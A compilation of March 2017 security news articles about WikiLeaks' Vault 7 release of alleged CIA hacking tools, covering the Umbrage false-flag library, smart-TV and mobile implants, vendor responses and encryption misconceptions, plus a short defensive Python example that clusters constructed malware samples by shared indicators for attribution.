WikiLeaks has claimed that the U.S. consulate in Frankfurt is used by the CIA as a covert base for hackers targeting Europe, the Middle East and Africa. Germany’s foreign ministry issued a statement saying that it takes such information very seriously and that it’s in touch with the U.S. on this matter.

According to Reuters, China also expressed concern after the WikiLeaks documents showed that the CIA may have targeted the devices of several Chinese companies, including Huawei and ZTE. The country once again claimed it opposes all forms of hacking and urged the U.S. to “stop listening in, monitoring, stealing secrets and internet hacking against China and other countries.”

London-based Privacy International has also issued a statement, saying that if the leaks are authentic, “they demonstrate what we’ve long been warning about government hacking powers — that they can be extremely intrusive, have enormous security implications, and are not sufficiently regulated.”

Technology companies whose products are listed in the Vault 7 leaks have launched investigations to assess the impact of the alleged CIA tools. Following an initial analysis of the available information – WikiLeaks has yet to make public any actual exploits – security firms and tech giants such as Apple and Google have determined that a majority of the vulnerabilities do not affect the latest versions of their products.


Wikileaks Vault7: CIA Umbrage team, the factory of false flag ops
9.3.2017 securityaffairs BigBrothers

Wikileaks Vault7 data leak – the Umbrage team was tasked by the Central Intelligence Agency for false flag hacking operations.
WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that detail CIA hacking tools and capabilities. Digging into the huge trove of files, it is possible to find information about the intelligence agency’s ability to fingerprint the hacking techniques used by threat actors in the wild, both state and non-state.
The CIA has built a specific team of experts, code-named Umbrage, under the Remote Development Branch inside the CIA’s Center for Cyber Intelligence.

“The CIA’s Remote Devices Branch’s UMBRAGE group collects and maintains a substantial library of attack techniques ‘stolen’ from malware produced in other states including the Russian Federation.

With UMBRAGE and related projects the CIA can not only increase its total number of attack types but also misdirect attribution by leaving behind the “fingerprints” of the groups that the attack techniques were stolen from,” states Wikileaks.

“UMBRAGE components cover keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.”

The team maintains a library of techniques borrowed from in-the-wild malware. The team serves multiple purposes: knowledge of attack patterns, of course, could help the agencies in forensic investigations to rapidly attribute the actions of attackers to a specific actor.

But there is also another explanation: the library could easily be included in the CIA’s projects to achieve the following goals:

To reduce the cost and time needed to develop hacking tools for use in cyber operations.

To make the attribution of cyber attacks harder and cause other threat actors to be blamed for the agency’s false flag operations.

The documents confirm that one technique borrowed by the Umbrage team was the wiping component used by the dreaded Shamoon malware, the malicious code that destroyed more than 30,000 computers at Saudi Aramco in 2012.

Since December, security experts have observed a spike in the number of attacks linked to a new variant of the malware, the so-called Shamoon 2.

The first Shamoon variant abused a commercial digitally-signed driver called RawDisk, developed by a company named Eldos.

The experts at the Umbrage team used the same technique implemented by the Shamoon malware. They devised a method to bypass the license check for the RawDisk driver and implemented the same disk wiping technique in an internal hacking tool dubbed Rebound.

As a result, malware researchers discovering a Rebound sample on a system would identify it as a Shamoon variant instead of a CIA implant.

The UMBRAGE team has many other techniques and tools in its arsenal. The experts were able for example to reproduce a persistence technique borrowed from the HiKit rootkit.

The CIA hackers are able to implement the webcam capture feature used by the infamous DarkComet RAT and also sandbox evasion techniques borrowed from the Trojan Upclicker and the Nuclear Exploit Pack.

CIA Umbrage team

The Umbrage team also drew on the code leaked in 2015 from the Italian surveillance company Hacking Team.

The CIA experts focused their efforts on the implementation of the set of implants used by the Hacking Team designed to hack Windows systems.

“If one is interested in using some implementations found in the source code, it should be considered a best practice to extract the desired pieces, and thoroughly review and test the extracted pieces,” is reported in the leaked files.

Unfortunately, many other intelligence agencies may have used a similar technique to deceive investigators.


10 Things You Need To Know About 'Wikileaks CIA Leak'
8.3.2017 thehackernews BigBrothers

Yesterday WikiLeaks published thousands of documents revealing top CIA hacking secrets, including the agency's ability to break into iPhones, Android phones, smart TVs, and Microsoft, Mac and Linux operating systems.
It dubbed the first release as Vault 7.
Vault 7 is just the first part of leak series “Year Zero” that WikiLeaks will be releasing in coming days. Vault 7 is all about a covert global hacking operation being run by the US Central Intelligence Agency (CIA).
According to the whistleblower organization, the CIA did not inform the companies about the security issues of their products; instead held on to security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, that millions of people around the world rely on.
One leaked document suggested that the CIA was even looking for tools to remotely control smart cars and trucks, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
While security experts, companies and non-profit organizations are still reviewing 8,761 documents released as Vault 7 archive, we are here with some relevant facts and points that you need to know.
Here's Everything You Need to Know About Vault 7:
WikiLeaks Exposes CIA's Mobile Hacking Secrets
Vault7 — CIA has an impressive list of ways to hack into your iOS, Android & Windows phones.
Vault 7 purportedly includes 8,761 documents and files that detail intelligence information on CIA-developed software intended to crack any Android smartphone or Apple iPhone, including some that could take full control of the devices.
In fact, Wikileaks alleges that the CIA has a sophisticated unit in its Mobile Development Branch that develops zero-day exploits and malware to "infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads."
Some of the attacks are powerful enough to allow an attacker to remotely take over the "kernel," the heart of the operating system that controls the smartphone operation, or to gain "root" access on the devices, giving the attacker access to information like geolocation, communications, contacts, and more.
These types of attacks would most likely be useful for targeted hacking, rather than mass surveillance.
The leaked documents also detail some specific attacks the agency can perform on certain smartphones models and operating systems, including recent versions of iOS and Android.
CIA Didn't Break Encryption Apps, Instead Bypassed It
Vault7 — CIA-made phone malware can read your private chats without breaking encryption.
In the hours since the documents were made available by WikiLeaks, a misconception was developed, making people believe the CIA "cracked" the encryption used by popular secure messaging software including Signal and WhatsApp.
WikiLeaks asserted that:
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Weibo, Confide and Cloakman by hacking the "smart" phones that they run on and collecting audio and message traffic before encryption is applied."
This statement by WikiLeaks made most people think that the encryption used by end-to-end encrypted messaging clients such as Signal and WhatsApp has been broken.
No, it hasn't.
Instead, the CIA has tools to gain access to entire phones, which would of course "bypass" encrypted messaging apps because it defeats virtually all other security measures on the phone, granting the agency total remote access.
The WikiLeaks documents do not show any attack specifically against Signal or WhatsApp; rather, the agency hijacks the entire phone and listens in before the applications encrypt and transmit information.
It’s like sitting on a train next to the target and reading his two-way text conversation on his phone or laptop while he's still typing. This doesn't mean that the security of the app the target is using has any issue.
In that case, it also doesn't matter if the messages were encrypted in transit if you are already watching everything that happens on the device before any security measure comes into play.
But this also doesn't mean that this makes the issue lighter, as noted by NSA whistleblower Edward Snowden, "This incorrectly implies CIA hacked these apps/encryption. But the docs show iOS/Android are what got hacked—a much bigger problem."
CIA Develops Malware to Target Windows, Linux & MacOS
Vault7 — CIA also develops cross-platform malware to hack Windows, MacOS & Linux Computers
The Wikileaks CIA dump also includes information about the malware that can be used by the agency to hack, remotely spy on and control PCs running Windows, macOS, and Linux operating systems.
This apparently means that the CIA can bypass PGP email encryption and even Virtual Private Network (VPN) on your computer in a similar way. The agency can also see everything you are doing online, even if you are hiding it behind Tor Browser.
Again, this also does not mean that using PGP, VPNs, or Tor Browser is not safe or that the CIA can hack into these services.
But the agency's ability to hack into any OS to gain full control of any device — whether it’s a smartphone, a laptop, or a TV with a microphone — makes the CIA capable of bypassing any such service and spying on everything that happens on that device.
CIA Borrowed Code from Public Malware Samples
Vault7 — CIA uses code from publicly available #malware samples to build its own spyware.
Yes, in addition to the attacks purportedly developed by the CIA, the agency has adopted some code from other, public sources of malware. Well, that's what many do.
One of the documents mentions how the agency supposedly tweaks bits of code from known malware samples to develop its custom code and more targeted solutions.
"The UMBRAGE team maintains a library of application development techniques borrowed from in-the-wild malware," the WikiLeaks document reads. "The goal of this repository is to provide functional code snippets that can be rapidly combined into custom solutions."
Some of the exploits listed were discovered and released by security firms, hacker groups, and independent researchers, or were purchased or otherwise acquired by the CIA from other intelligence agencies, such as the FBI, NSA, and GCHQ.
One borrowed exploit in "Data Destruction Components" includes a reference to Shamoon, a nasty malware that has the capability to steal data and then completely wipe out hard-drives.
Another attack acquired by the CIA is SwampMonkey, which allows the agency to get root privileges on undisclosed Android devices.
Persistence, another tool in the CIA arsenal, allows the agency to gain control over the target device whenever it boots up again.
CIA Used Malware-Laced Apps to Spy on Targets
Vault7 — Fine Dining Attack: CIA used #malware-laced apps to spy on its targets.
The leaked documents include a file, named "Fine Dining," which does not contain any list of zero-day exploits or vulnerabilities, but a collection of malware-laced applications.
Fine Dining is a highly versatile technique which can be configured for a broad range of deployment scenarios, as it is meant for situations where the CIA agent has to infect a computer physically.
CIA field agents store one or more of these infected applications -- depending upon their targets -- on a USB, which they insert in their target's system to run one of the applications to gather the data from the device.
Developed by OSB (Operational Support Branch), a division of the CIA's Center for Cyber Intelligence, Fine Dining includes modules that can be used to weaponize the following applications:
VLC Player Portable
Irfanview
Chrome Portable
Opera Portable
Firefox Portable
ClamWin Portable
Kaspersky TDSS Killer Portable
McAfee Stinger Portable
Sophos Virus Removal
Thunderbird Portable
Opera Mail
Foxit Reader
LibreOffice Portable
Prezi
Babel Pad
Notepad++
Skype
Iperius Backup
Sandisk Secure Access
U3 Software
2048
LBreakout2
7-Zip Portable
Portable Linux CMD Prompt
The CIA's Desperation To Crack Apple's Encryption
Vault7 — CIA has desperately been working for years to break Apple's Encryption.
This is not the first time that the CIA has been caught targeting iOS devices. It was previously disclosed that the CIA was targeting Apple's iPhones and iPads, following the revelation in 2015 of top-secret documents from the agency's internal wiki system, part of the Snowden leaks.
The documents described that the CIA had been "targeting essential security keys used to encrypt data stored on Apple's devices" by using both "physical" and "non-invasive" techniques.
In addition to the CIA, the FBI hacking division Remote Operations Unit has also been working desperately to discover exploits in iPhones, one of the WikiLeaks documents indicates.
That could also be the reason behind the FBI's effort to force Apple into developing a working exploit to unlock the iPhone belonging to one of the terrorists in the San Bernardino case.
Apple Says It Has Already Patched Most Flaws Documented in CIA Leak
Vault7 — Apple says it has already patched many iOS vulnerabilities revealed in CIA Leaks.
Besides vulnerabilities in Android and Samsung Smart TVs, the leaked documents detail 14 iOS exploits, describing how the agency uses these security issues to track users, monitor their communications, and even take complete control of their phones.
However, Apple is pushing back against claims that the CIA's stockpiled bugs for its devices are still effective.
According to Apple, many iOS exploits in the Wikileaks CIA document dump have already been patched in its latest iOS version, released in January, while Apple engineers continue to work to address any new vulnerabilities that were known to the CIA.
Here's the statement provided by an Apple spokesperson:
"Apple is deeply committed to safeguarding our customers’ privacy and security. The technology built into today’s iPhone represents the best data security available to consumers, and we’re constantly working to keep it that way. Our products and software are designed to quickly get security updates into the hands of our customers, with nearly 80 percent of users running the latest version of our operating system. While our initial analysis indicates that many of the issues leaked today were already patched in the latest iOS, we will continue work to rapidly address any identified vulnerabilities. We always urge customers to download the latest iOS to make sure they have the most recent security updates."
Hacking 'Anyone, Anywhere,' Thanks to Internet Of 'Insecure' Things
Vault7 — CIA can hack your Smart TV and other smart devices to spy on you.
Besides hundreds of exploits, zero-days, and hacking tools that target a large number of software products and services, Vault 7 also includes details about a surveillance technique, codenamed Weeping Angel, used by the CIA to infiltrate smart TVs.
Samsung smart TVs were found to be vulnerable to Weeping Angel, which places the TV in a "Fake-Off" mode: the owner believes the TV is off when it is actually on, allowing the CIA to covertly record conversations "in the room" and send them "over the Internet to a covert CIA server."
"Weeping Angel already hooks key presses from the remote (or TV goes to sleep) to cause the system to enter Fake-Off rather than Off," the leaked CIA document reads. "Since the implant is already hooking these events, the implant knows when the TV will be entering Fake-Off mode."
In response to the WikiLeaks CIA documents, Samsung released a statement that reads: "Protecting consumers' privacy and the security of our devices is a top priority at Samsung. We are aware of the report in question and are urgently looking into the matter."
WikiLeaks' CIA Leak Isn't Bigger than Snowden's NSA Leaks
The CIA isn't more advanced than the NSA's TAO team, and the Vault 7 leak isn't bigger than Snowden's.
WikiLeaks claims the massive CIA hacking leak is larger than Edward Snowden's revelations about the NSA's hacking and surveillance programs, but it is considerably smaller.
While the Snowden revelations disclosed global covert surveillance of text and voice communications, using tools that permitted mass data gathering and analysis, the CIA dump so far shows only that the CIA gathered and purchased tools for targeting individual devices.
There is no evidence of mass surveillance of smartphones or computers in the leaked documents. Technologically, the NSA is far ahead of the CIA in sophistication and technical expertise.
Ex-CIA Chief Says Wikileaks dump has made US 'less safe'
Vault7 — Ex-CIA Chief says CIA files leaked by Wikileaks is incredibly damaging and has put lives at risk.
Former CIA boss Michael Hayden said the latest leak of highly sensitive CIA documents and files by Wikileaks is "incredibly damaging" and has put lives at risk, BBC reports, while the CIA has not yet commented on the leaks.
The CIA revelations by the whistleblower organization are just beginning. People will see more revelations about the government and agencies from the WikiLeaks in coming days as part of its Year Zero leaks.


"Vault 7" Leak Shows CIA Learned From NSA Mistakes

8.3.2017 securityweek BigBrothers
WikiLeaks’ “Vault 7” release appears to confirm that the U.S. National Security Agency (NSA) was behind the threat actor tracked as the “Equation Group.” Documents also show that the Central Intelligence Agency (CIA) learned from the NSA’s mistakes after its activities were exposed by security researchers.

Files allegedly obtained from a high-security CIA network provide details on the intelligence agency’s vast hacking capabilities. One of the files made available by WikiLeaks contains a discussion thread titled “What did Equation do wrong, and how can we avoid doing the same?”

The operations of the Equation Group and its links to the NSA were detailed by Kaspersky Lab in February 2015, and the discussion made public by WikiLeaks was initiated a few days later.

Participants in the discussion pointed out that one of the NSA’s biggest mistakes was that its tools shared code, including custom cryptography, giving researchers the data needed to connect different malware to the same group.

“The ‘custom’ crypto is more of NSA falling to its own internal policies/standards which came about in response to prior problems,” one user wrote.

In addition to using the same custom cryptographic algorithm, the CIA identified several other mistakes made by the NSA, including the reuse of exploits, use of internal tool names in the code, and the use of a unique mutex.

“All their tools shared code. The custom RC5 was everywhere. The techniques for positive ID (hashing) was used in the same way in multiple tools across generations,” another user said.

“The shared code appears to be the largest single factor in allowing [Kaspersky Lab] to tie all these tools together. The acquisition and use of C&C domains was probably number 2 on the list, and I'm sure the [Computer Operations Group] infrastructure people are paying attention to this.”
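The thread's point, that shared code, shared crypto constants, a reused mutex name and reused C&C domains are what let researchers tie separate tools to one group, is the same logic a defender applies in reverse when clustering samples. The Python below is an added example written for this page, not CIA, NSA or Kaspersky code: it pulls crude indicators out of constructed sample blobs (the published RC5/RC6 key-schedule constants, found the way FindCrypt-style scanners do, plus long printable strings such as mutex names, internal tool names and C2 hostnames), scores each pair of samples by Jaccard similarity over those indicators, and groups samples that share enough of them. The three blobs, the mutex name `Global\{8F6C1A2B-MUTEX}`, the tool name `SAMPLE_TOOL_v2` and the domain `update.example.invalid` are made up for the example; PE boilerplate strings are deliberately ignored because every Windows binary shares them.

```python
import re
import struct
from itertools import combinations

# Magic constants whose presence in a binary is a strong hint that the
# algorithm is compiled in (the FindCrypt approach). P32/Q32 are the RC5
# key-schedule constants; RC6 uses the same pair, so a hit is reported as
# "RC5/RC6", not RC5 alone.
CRYPTO_CONSTANTS = {
    "RC5/RC6 P32": 0xB7E15163,
    "RC5/RC6 Q32": 0x9E3779B9,
    "MD5 init A": 0x67452301,
}

# Strings that every PE carries; sharing them says nothing about authorship.
BOILERPLATE = ("cannot be run in DOS mode",)


def find_crypto_constants(blob: bytes) -> set:
    """Names of known algorithm constants present as 32-bit little-endian words."""
    return {name for name, value in CRYPTO_CONSTANTS.items()
            if struct.pack("<I", value) in blob}


def extract_strings(blob: bytes, min_len: int = 8) -> set:
    """Printable-ASCII runs of at least min_len bytes, minus PE boilerplate."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    found = {m.group().decode("ascii") for m in pattern.finditer(blob)}
    return {s for s in found if not any(b in s for b in BOILERPLATE)}


def indicators(blob: bytes) -> set:
    """Tagged indicator set for one sample: crypto constants plus strings
    (mutex names, internal tool names and C2 hostnames all surface here)."""
    return ({"const:" + c for c in find_crypto_constants(blob)}
            | {"str:" + s for s in extract_strings(blob)})


def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if (a | b) else 0.0


def link_samples(samples: dict, threshold: float = 0.5):
    """Pairwise similarity over indicator sets, then union-find clustering.

    Returns (clusters, links): clusters is a sorted list of sorted sample-name
    lists; links maps each linked pair to (score, shared indicators), i.e. the
    evidence an analyst would cite for tying the two together.
    """
    ind = {name: indicators(blob) for name, blob in samples.items()}
    parent = {name: name for name in samples}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    links = {}
    for a, b in combinations(sorted(samples), 2):
        score = jaccard(ind[a], ind[b])
        if score >= threshold:
            links[(a, b)] = (round(score, 3), sorted(ind[a] & ind[b]))
            parent[find(a)] = find(b)

    groups = {}
    for name in samples:
        groups.setdefault(find(name), set()).add(name)
    return sorted(sorted(g) for g in groups.values()), links


# Constructed samples (not real malware): three blobs mimicking the artefacts
# the discussion lists. Mutex name, tool name and domain are hypothetical.
RC5_P = struct.pack("<I", 0xB7E15163)
RC5_Q = struct.pack("<I", 0x9E3779B9)
PE_BOILER = b"!This program cannot be run in DOS mode.\x00"
SAMPLES = {
    "implant_gen1.bin": (PE_BOILER + b"\x90" * 8 + RC5_P + RC5_Q
                         + b"Global\\{8F6C1A2B-MUTEX}\x00"
                         + b"\x55\x8b\xec" + b"SAMPLE_TOOL_v2\x00"),
    "implant_gen2.bin": (PE_BOILER + b"\xcc" * 5 + RC5_P + RC5_Q
                         + b"Global\\{8F6C1A2B-MUTEX}\x00" + b"\x00" * 9
                         + b"update.example.invalid\x00"),
    "unrelated.bin": (PE_BOILER + b"\x00" * 12
                      + struct.pack("<I", 0x67452301) + b"\x00"
                      + b"Software\\ExampleCorp\\Updater\x00" + b"setup.log\x00"),
}

if __name__ == "__main__":
    clusters, links = link_samples(SAMPLES)
    for (a, b), (score, shared) in links.items():
        print(f"{a} <-> {b}: jaccard={score}, shared={shared}")
    print("clusters:", clusters)
```

The two "implant" blobs land in one cluster because they share the RC5/RC6 constants and the mutex name, exactly the kind of evidence the thread complains about; the third blob, which only shares PE boilerplate, stays alone. On real corpora the same idea is applied with much richer features (function hashes, import tables, TLS certificate reuse), and the threshold is tuned against known-benign shared libraries so that, for example, every binary statically linking the same crypto library is not lumped together.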

The Vault 7 files show that in addition to learning from the NSA’s mistakes, the CIA “borrowed” techniques from in-the-wild malware and tools, including Shamoon, UpClicker and the Nuclear exploit kit.

Security firms have started assessing the impact of the exposed hacking capabilities. WikiLeaks has not released any exploits, which makes it difficult to determine exactly what the CIA programs are capable of. However, at first sight, the intelligence agency’s tools don’t appear to be very sophisticated.


Security Firms Assess Impact of CIA Leak

8.3.2017 securityweek BigBrothers
Security firms have started assessing the impact of the CIA hacking tools exposed on Tuesday by WikiLeaks as part of the leak dubbed “Vault 7.”

Files allegedly obtained from a high-security CIA network appear to show that the intelligence agency has tools for hacking everything, including mobile devices, desktop computers, routers, smart TVs and cars.

The published files also appear to show that the CIA has targeted the products of many security solutions providers, including anti-malware and secure messaging applications. The list of affected vendors includes Symantec, Kaspersky, Avira, F-Secure, Microsoft, Bitdefender, Panda Security, Trend Micro, ESET, Avast, AVG, McAfee, Comodo and G Data.

While WikiLeaks has not released any of the exploits it has obtained, an initial investigation conducted by security firms indicates that the CIA’s capabilities may not be as advanced as some have suggested.

Rob Graham (@ErrataRob) on Twitter, 8 March 2017: "...in 2017, phones with "monitor mode" are now some CIA cyber super weapon https://twitter.com/wikileaks/status/839210002694942725"

Rob Graham (@ErrataRob): "...what Wikileaks won't tell you: almost everything in their dump is dreadfully ordinary, widely known by the cybersec/hacking community"

Bitdefender told SecurityWeek that the public Vault 7 files show that the CIA had been having problems evading the company’s products.

Kaspersky Lab said one of the vulnerabilities mentioned in the report was patched in 2009, while another was addressed in December 2015.

“All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release. The products mentioned in the Wikileaks report (KIS 7, KIS 8, WKSTN MP3) are outdated versions of Kaspersky Lab software and have been out of the technical support lifecycle for several years,” the security firm said in an emailed statement.

“We would like to stress that the documents published by Wikileaks do not describe any computer breaches against Kaspersky Lab, or against any other security firms or customers, but instead depict efforts to reverse engineer and find vulnerabilities in computer security software products,” it added.

Comodo also said its product appeared to pose problems to the CIA. WikiLeaks mentioned that the agency had bypassed Comodo’s product by hiding malware in the Recycle Bin, but the vendor said such tricks would not have worked against versions of its product released in the past four years.

“What we are seeing in the leaked documents are their desperate attempts to build a hack, step-by-step, with the ultimate goal of achieving a total bypass of the security, such as trying to find something like a kernel exploit. But as their email says, in the case of Comodo, they end up with nothing,” said Melih Abdulhayoglu, founder and CEO of Comodo.

Microsoft, whose EMET and Security Essentials products are mentioned in the leak, told SecurityWeek that it’s aware of the report and looking into it. Trend Micro and F-Secure are also investigating.

“F-Secure is mentioned in the leak, citing the CIA can potentially bypass some of our products. But the question is really not whether the CIA can bypass our products, the answer to that is always yes. If they cannot do it right now, they invest another million to find a flaw,” said F-Secure’s Mikko Hypponen.

Panda Security says it has yet to find exploits or tools targeting its products in the publicly available files.

“That doesn't mean there won't be any, at the end of the day we are talking about software. We expected to be there, the fact that we do not collaborate in any way to spy on our users turns Panda into a target for the CIA, FSB, and that kind of organizations,” said Luis Corrons, Technical Director of PandaLabs.

As for enterprise security vendors, Juniper Networks has not found any evidence that its products have been targeted, but there appear to be several exploits targeting Cisco devices. Cisco has yet to release any information.

Secure messaging tools not compromised

WikiLeaks reported that the CIA had found a way to bypass the encryption of Signal, Telegram, WhatsApp and other secure messaging applications.

While many jumped to conclude that the agency had actually broken the encryption of these apps, WikiLeaks actually meant that gaining access to a mobile device using iOS and Android exploits could have given the CIA access to conversations, without having to break their encryption.


Wikileaks CIA Files – What this means for Internet security and encryption
8.3.2017 securityaffairs BigBrothers

Earlier today, Wikileaks dumped a large database of secret documents from the CIA in a release dubbed Vault7. Here we do a deeper analysis of the leak and its broader implications for online security and encrypted services.
Our in-depth analysis of the leaked CIA files is found at the bottom of this post. First, we will discuss the main question on everybody’s mind – how are encrypted services like ProtonMail impacted, and what insights did we gain into the strategies of state-backed attackers.

No, Encryption Is Not Dead
Immediately after the news broke, stories began circulating along the lines of “Signal/Whatsapp encryption broken!”, fueled in part by tweets put out by Wikileaks. This was followed, predictably, by online chatter speculating about whether or not ProtonMail had been cracked.


We can state quite unequivocally that there is nothing in the leaked CIA files which indicates any sort of crack of ProtonMail’s encryption. And despite claims to the contrary, there is also no evidence that Signal/Whatsapp end-to-end encryption has been breached. Here’s what we do know:

Over the past three years, the CIA has put together a formidable arsenal of cyberweapons specially designed to gain surveillance capabilities over end-user devices such as mobile phones and laptop/desktop computers. This advanced malware enables the CIA to record actions such as keystrokes on a mobile device, allowing it to conduct surveillance without breaking encryption. Through this technique, US intelligence agencies can gain access to data before it has been encrypted. This is in fact the only practical way to obtain the data, because cracking the cryptography used in advanced secure communication services such as ProtonMail and Signal is still impractical with current technology.

In other words, the core cryptographic algorithms and techniques used by ProtonMail and other encrypted services remain secure. The exploitation of user endpoints (mobile phones, personal computers, etc) is actually not a new technique, but one that has existed since the first malware was created. This unfortunately is not something that cryptography is designed to defend against, as encryption by itself cannot guarantee the security of end-user devices. What the CIA files dumped by Wikileaks do reveal however, is a monumental shift in strategy since the last disclosure of this kind was made by Edward Snowden in 2013.

State-backed Cyberattack Strategy is Changing
ProtonMail is a tool used by millions of people around the world to secure their email communications. In addition to ordinary people and businesses, ProtonMail is also used by journalists, activists, and dissidents, who often require protection from government surveillance for their personal safety. Because of these factors, we make it our business to carefully study and understand state adversaries in order to better protect our userbase.

The Wikileaks CIA files are therefore a comprehensive update on state cyberwarfare strategies since Snowden gave us the first edition. In fact, the trends that the files reveal are arguably global, since it is highly probable that other major players in this space (Russia, China, the UK, Israel, etc.) have independently reached the same conclusions regarding overall strategy.

Some of the most interesting revelations from the Snowden leaks were the extent to which the NSA actively sought out information from the US tech giants, with or without their consent. This made a lot of sense, because the biggest global databases of sensitive personal data do not belong to the NSA but to companies like Google and Facebook, which have already shown ample willingness to exploit such data for profit, sometimes via unscrupulous means.

Since 2013 however, the world has changed. Consumer and business awareness of online privacy and security is at an all time high, and more and more people around the world are increasingly choosing more secure services which respect privacy. Today, end-to-end encryption has gone mainstream, and services such as ProtonMail and Whatsapp boast millions of regular people as users. The use of end-to-end encryption means services such as ProtonMail are not actually able to decrypt user data. Even if we wanted to compromise user data, we do not have the technical means to decrypt the user emails. Furthermore, even if an attacker breached ProtonMail servers, all the emails stored on our servers are encrypted, so an attacker also would not be able to read user emails.

It’s clear from the leaked CIA documents that as the world has changed, state-backed cyberattackers have also evolved. As we describe below, the varied leaked files are tied together by a common thread: an almost singular focus on producing malware to attack end-user devices. This is a logical response to the rise of end-to-end encrypted services such as ProtonMail. Such services have significantly raised the barrier to obtaining data directly from the service provider, and many are now based outside of the United States, beyond the reach of legal coercion. As a result, it has become easier and more productive to directly hack individual users.

This opens up a terrifying new narrative where government spies are actively deploying viruses and trojans against their own citizens, joining the ranks of common cybercriminals. While this is by no means good news for privacy rights worldwide, it is in some ways, a win for privacy tech, because governments are having to shift away from mass surveillance and towards more targeted surveillance. In short, services such as ProtonMail are doing exactly what they were designed to do, which is raising barriers to large scale mass surveillance.

Our initial analysis into the Wikileaks CIA documents can be found below. Questions can be directed to media@protonmail.ch. If you would like to start benefiting from secure email, you can get a free ProtonMail account here.

Best Regards,
The ProtonMail Team

ProtonMail Analysis of Wikileaks CIA Documents
#Vault7 in a sentence: It is a leak about the CIA’s hacking arsenal used against foreign governments and citizens both domestically and abroad.

Name of the database: Vault7. It is the first part in a series of leaks titled Year Zero.

Origin: CIA’s Center for Cyber Intelligence unit in Langley, Virginia USA

Volume: 7,818 web pages with 943 attachments. According to Wikileaks, the entire archive of CIA material consists of several hundred million lines of computer code. Estimated to be bigger than the Snowden leaks (unconfirmed).

Dates of documents: 2013 (when Snowden left the intelligence community) to 2016.

Intention: the source of the information told WikiLeaks in a statement that they wish to initiate a public debate about the “security, creation, use, proliferation and democratic control of cyber weapons.”

How is it different from the Snowden leaks: Snowden leaks exposed the NSA and its techniques of blanket surveillance on citizens and governments around the world. Vault7, on the other hand, exposes the CIA and what technologies it uses in cyber warfare against foreign governments as well as against targeted individuals.

What did we learn so far?
As we are examining the documents, we have identified that the leak concerns the CIA and what cyber weapons it uses. Over the next weeks we will continue to verify and update the information. Below is what we know so far about the programs used by the CIA, legality of the operations, and what this means for your privacy and security.

Programs used by the CIA
Weeping Angel – A program that turns the microphones of smart TVs into surveillance tools. By compromising the TV, CIA hackers are able to turn on people’s smart TVs and listen to users’ conversations. In effect, Weeping Angel transforms smart TVs into bugs.

Our team quickly drew parallels between Weeping Angel and other surveillance tools described by Snowden. Weeping Angel bears a close resemblance to Nosey Smurf, a tool used by the UK’s GCHQ to turn on a phone’s microphone and use it for audio surveillance, while Tracker Smurf is a geo-location tool that offers a more accurate method of locating a phone and its carrier than triangulation.

Zero day – Not a single program but the general class of unpatched vulnerabilities the CIA weaponizes against its targets’ devices. WikiLeaks reports that such exploits have been used primarily against companies in industrial espionage. In 2013, Snowden also revealed that the NSA was committing industrial espionage against Brazilian, Russian and European oil companies, banks, airlines and trade delegations. According to Vault7, the CIA’s hacking division had produced over “a thousand hacking systems, trojans, viruses, and other ‘weaponized’ malware.”

Hive is a multi-platform CIA malware suite that can be specifically utilized against states. “The project provides customizable implants for Windows, Solaris, MikroTik (used in internet routers) and Linux platforms and a Listening Post (LP)/Command and Control (C2) infrastructure to communicate with these implants.”

There are many parallels between Hive and Zero Day and the 2010 Stuxnet virus that attacked and infected the Iranian Nuclear program. Although no state took responsibility for the attack in 2010, Stuxnet has been linked by political pundits to American and Israeli surveillance and intelligence agencies due to its degree of sophistication.

Hacking mobiles
Vault7 also reveals that the CIA has developed advanced capabilities for hacking mobile phones. The leaks show that the agency developed and used its tool to primarily control mobile phones and then extract data from them.

The CIA’s Mobile Development Branch (MDB) produces malware to pull data from iPhones and other Apple products running iOS, such as iPads. MDB also targets Android, a far more widespread system than iOS and the default operating system on the majority of smartphones, including those from Sony, Samsung and Google’s Pixel line. “Year Zero” shows that as of 2016 the CIA had 24 “weaponized” Android “zero days”, some developed in-house and others obtained from GCHQ, the NSA and cyber arms contractors.

Framing other governments
We were alarmed by the discovery of a tool that allows the CIA to potentially frame foreign governments for its cyber warfare acts. It works as follows. Imagine that each government or hacking group has its own signature move, its own malicious software, or a combination of both, that it uses to attack its targets. After a while, whenever an attack occurs, it can be linked to a group based on that fingerprint.

WikiLeaks reports that a program run by the CIA’s Remote Devices Branch, called UMBRAGE, “collects and stores an extensive library of attack techniques”. According to Vault7, the amassed techniques include those frequently used by Russia.

Some of the techniques currently at CIA’s disposal via UMBRAGE include: keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.

Vault7 reveals that the CIA has also produced rules on how its malware should be hidden when deployed to avoid any fingerprints leading back to the US or the agency.

Was this legal?
Preliminary findings indicate that the CIA knew about, and deliberately enabled, the spread of these tools. In fact, according to WikiLeaks, the agency wanted the programs to stay on the right side of its own rules so that agents or CIA-sponsored hackers could operate with full impunity.

According to Vault7, if CIA software were classified, then officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. As a result, “the CIA has secretly made most of its cyber spying/war code unclassified”. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufacturers and computer hackers can freely “pirate” these ‘weapons’ if they obtain them. The CIA has primarily had to rely on obfuscation to keep its malware secret.

Why is this critical?
While we are still mapping the dangers of such findings and capabilities, some conclusions are clear.

The CIA can frame other governments
By using Hive and zero-day exploits, the US can wage a cyber attack against a nation state while purposefully leaving behind a trace that leads to another state. As governments around the world move control of their infrastructure online, any cyber attack can have a devastating effect if targeted against hospitals, power plants or telecommunications providers.

CIA backdoors can be exploited by others
When the CIA undermines a service or a device, it creates a backdoor that can be abused by other parties. With the agency’s newly revealed tools, everything people do or say around their phones and TVs can create a very revealing and intimate picture of their lives.


WikiLeaks releases documents detailing CIA hacking tools and capabilities
8.3.2017 securityaffairs BigBrothers

